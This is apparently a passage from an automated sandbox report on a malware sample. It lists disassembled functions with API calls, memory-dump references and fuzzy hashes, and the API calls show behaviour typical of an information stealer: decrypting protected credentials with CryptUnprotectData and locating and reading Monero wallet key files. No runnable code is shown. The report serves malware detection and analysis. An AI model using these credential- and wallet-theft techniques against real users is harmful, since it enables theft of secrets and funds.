                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: yW$!)N~$eLM
                          • API String ID: 0-2963522718
                          • Opcode ID: 8b625bfd389406f9e14cc9eba3ee55907192dbb2f119774d875c5f817b1b2b85
                          • Instruction ID: b748d92cdf605952692450c9f57414b44107944fb5f2a38ddc2677352a989edf
                          • Opcode Fuzzy Hash: 8b625bfd389406f9e14cc9eba3ee55907192dbb2f119774d875c5f817b1b2b85
                          • Instruction Fuzzy Hash: 03B216F3A0C2009FE304AE2DEC8567ABBE5EF94720F16853DEAC5C3744E63598158697
                          Function 00133720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0013E118,00000000,00000001,0013E108,00000000), ref: 00133758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001337B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                          • Instruction ID: e1f689fa069158809c4d53d1e8600c956cc7fc5397f1e1b0ea5e8f3b9c9138ab
                          • Opcode Fuzzy Hash: 07454e2132b0b92d1914b5b57545cdca4c3ee7b922c021d05b06dd4b5292ff45
                          • Instruction Fuzzy Hash: F741C970A40A189FDB24DB58CC95F9BB7B5BB48702F4082D8E619A72D0D7B16E85CF50
                          Function 00129B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                          • LocalFree.KERNEL32(?), ref: 00129BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 25ad503e6a1a8ee0817907f34357c95babcbb2fa3614b5ed0024321d417cd486
                          • Instruction ID: 2d2ddcda7b4c00bb6698b69bc7b3a1290b39537db8046fa7f33b127665cc4f95
                          • Opcode Fuzzy Hash: 25ad503e6a1a8ee0817907f34357c95babcbb2fa3614b5ed0024321d417cd486
                          • Instruction Fuzzy Hash: FE11BAB8A00209DFDB05DF98D989EAE77B9FF88300F104558E915A7350D770AE10CFA1
                          Function 004E822E Relevance: 4.2, Strings: 2, Instructions: 1656COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^l['$zk~
                          • API String ID: 0-1084074335
                          • Opcode ID: e7f4d5bb33f76835412a9e5ceb51df93b2205497dbf078d514b6520261b1925c
                          • Instruction ID: 9b18fe980c05d5a93b399560b8e1ac7c3cff6d8cd58712a31a6780039d1bf386
                          • Opcode Fuzzy Hash: e7f4d5bb33f76835412a9e5ceb51df93b2205497dbf078d514b6520261b1925c
                          • Instruction Fuzzy Hash: F7B219F360C2009FE308AE2DEC8567AB7E9EF94720F1A453DE6C4C7744EA7558058696
                          Function 004EB8A6 Relevance: 4.1, Strings: 2, Instructions: 1580COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Di$FGl
                          • API String ID: 0-934752213
                          • Opcode ID: 6e8e10db5283d05b4421876d410ffb19fa8baa7dd5cc4af2a64bca311a9e934b
                          • Instruction ID: 24596a2fa3c44dab1fcdb0bd69096ba868cfb88810555d08edc93573e8a49bab
                          • Opcode Fuzzy Hash: 6e8e10db5283d05b4421876d410ffb19fa8baa7dd5cc4af2a64bca311a9e934b
                          • Instruction Fuzzy Hash: C2B2F7F390C2049FE3046E29EC8567AFBE9EF94720F1A893DEAC583744E63558058797
                          Function 004E20DD Relevance: 3.2, Strings: 2, Instructions: 705COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: LAC@$P~
                          • API String ID: 0-2286227996
                          • Opcode ID: 2e5278e22b2276a944afb2e5a155b515c9d6458e06c9b5c0c8d92d8fa461ed75
                          • Instruction ID: d09248d9580e5736e4ab0b19f11a37c6032252c14e16e9975d8df1cc19c917fc
                          • Opcode Fuzzy Hash: 2e5278e22b2276a944afb2e5a155b515c9d6458e06c9b5c0c8d92d8fa461ed75
                          • Instruction Fuzzy Hash: 912217F360C3149FD304AE6DEC8576ABBE9EF98320F16493DEAC4C3744EA7558048696
                          Function 004E5070 Relevance: 2.5, Strings: 1, Instructions: 1261COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #do
                          • API String ID: 0-3463800784
                          • Opcode ID: f2da50473eaf3d93b251330c512c3b584a1746b2b5a2c3e17b4d6afd8648f4ac
                          • Instruction ID: d0a910e41894d209021896fa16bf824ac32bb90a8a4e228feedf2dafeaa03107
                          • Opcode Fuzzy Hash: f2da50473eaf3d93b251330c512c3b584a1746b2b5a2c3e17b4d6afd8648f4ac
                          • Instruction Fuzzy Hash: FC82F5F360C204AFE304AE69EC8577AB7E5EFD4720F1A893DE6C4C3744EA3558058696
                          Function 006134B5 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Jc=
                          • API String ID: 0-2291069331
                          • Opcode ID: 8773f003bfbbcb366be4da973bf9fe58c66699673d85c1ab2e06a0521c1e7d04
                          • Instruction ID: 3c9caacb1b077c6f70588b3e021aa8a473bbda93f4e5fd75be0625550ada78cc
                          • Opcode Fuzzy Hash: 8773f003bfbbcb366be4da973bf9fe58c66699673d85c1ab2e06a0521c1e7d04
                          • Instruction Fuzzy Hash: 7FB1BAF3A082149FE7109E2CEC847ABB7D6EF94710F2A4A3DEAC5C3744E5359D058686
                          Function 0057F832 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;jn
                          • API String ID: 0-3078770120
                          • Opcode ID: 44edd84c0ce58a3379cb4ef9346bf4b4bbeca8b6471efdd88f74c452730757e6
                          • Instruction ID: ba99744c347ec9d5a68e40b7c8bb74aa29a0ebae3499756dc53c483cbcda79a9
                          • Opcode Fuzzy Hash: 44edd84c0ce58a3379cb4ef9346bf4b4bbeca8b6471efdd88f74c452730757e6
                          • Instruction Fuzzy Hash: 0241C6F3A1C1009BD318BE2DDC81B6ABBE5EB58310F16493DEAC4C7754EA3594108B87
                          Function 004F6C1F Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: pJ=v
                          • API String ID: 0-3841518369
                          • Opcode ID: bb3430de9b5191fbb2dd27c397ce017c7d604250cbf869dfe5dc820cee31221a
                          • Instruction ID: ee450f0fa5cf6673f43680f436b744aa3b7ffab47905de309989bf415e9ec196
                          • Opcode Fuzzy Hash: bb3430de9b5191fbb2dd27c397ce017c7d604250cbf869dfe5dc820cee31221a
                          • Instruction Fuzzy Hash: 373116B76086049FE304AE2BED4463BF7E6EFD4B20F15C52DE6C4C7608DA3488068696
                          Function 003DAE43 Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31fa23243c9a9884c97354c9ccc1bbe0410829e8ddecbae672c928c4206f0ee0
                          • Instruction ID: f0d01a09a973d52c88da1deee2bb786cac33c1f971669bd244bf81b5d6c409c4
                          • Opcode Fuzzy Hash: 31fa23243c9a9884c97354c9ccc1bbe0410829e8ddecbae672c928c4206f0ee0
                          • Instruction Fuzzy Hash: B5513BF3E155205BE704AA3DDD457A6BAD6DBE4320F1B463DDA88D33C0E978580542D2
                          Function 00139750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00130250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
